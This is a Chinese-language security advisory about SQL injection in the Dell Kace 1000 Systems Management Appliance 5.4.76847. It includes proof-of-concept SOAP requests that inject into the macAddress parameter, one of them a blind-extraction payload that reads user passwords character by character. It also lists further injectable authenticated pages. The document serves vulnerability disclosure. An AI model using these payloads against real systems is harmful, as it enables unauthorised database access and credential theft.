发布日期:2014-01-13
更新日期:2014-01-22
受影响系统:
Dell Kace 1000 Systems Management Appliance 5.4.76847
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 65029
Dell Kace 1000 Systems Management Appliance是系统管理设备。
Dell Kace 1000 Systems Management Appliance 5.4.76847及其他版本没有正确过滤getUploadPath及getKBot SOAP方法的"macAddress"参数值,可导致注入任意SQL代码,从而操作SQL查询。
<*来源:Rohan Stelling
Bart Borkowski
Alex Manusu
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Proof of Concept
Page: /service/kbot_service.php
Web method: getUploadPath
Parameter: macAddress
PoC: Variations of the statement within in the HTTP request below introduce invalid SQL syntax resulting in a database error.
POST /service/kbot_service.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host:
SOAPAction: "urn:#getUploadPath"
Content-Length: 543
<soapenv:Envelope xmlns:xsi="http://www.example.org/2001/XMLSchema-instance" xmlns:xsd="http://www.example.org/2001/XMLSchema" xmlns:soapenv="http://example.xmlsoap.org/soap/envelope/" xmlns:urn="urn:kbot_service.wsdl">
<soapenv:Header/>
<soapenv:Body>
<urn:getUploadPath soapenv:encodingStyle= "http://example.xmlsoap.org/soap/encoding/">
<macAddress xsi:type="xsd:string">' or '1'='1</macAddress>
<filename xsi:type="xsd:string">test</filename>
</urn:getUploadPath>
</soapenv:Body>
</soapenv:Envelope>
Page: /service/kbot_service.php
Web method: getKBot
Parameter: macAddress
PoC: Variations of the statement within in the HTTP request below introduce invalid SQL syntax resulting in a database error.
POST /service/kbot_service.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host:
Content-Type: text/xml;charset=UTF-8
SOAPAction: "urn:#getKBot"
Content-Length: 553
<soapenv:Envelope xmlns:xsi="http://www.example.org/2001/XMLSchema-instance" xmlns:xsd="http://www.example.org/2001/XMLSchema" xmlns:soapenv="http://example.xmlsoap.org/soap/envelope/" xmlns:urn="urn:kbot_service.wsdl">
<soapenv:Header/>
<soapenv:Body>
<urn:getKBotConfig soapenv:encodingStyle="http://example.xmlsoap.org/soap/encoding/">
<macAddress xsi:type="xsd:string">' or (select ascii(substring(PASSWORD,1,1)) from USER limit 2,1) = 101 and ''='</macAddress>
</urn:getKBotConfig>
</soapenv:Body>
</soapenv:Envelope>
The following pages also appear to be affected by similar SQL injection weaknesses, however require authentication:
Page: /userui/advisory_detail.php
PoC: ?ID=9-2
Notes: Requires Authentication
Page: /userui/ticket_list.php?SEARCH_SELECTION=any&ORDER[]=ID
Parameter: ORDER[]
Notes: Requires Authentication
Page: /userui/ticket.php?ID=86
Parameter: ID
Notes: Requires Authentication
建议:
--------------------------------------------------------------------------------
厂商补丁:
Dell
----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: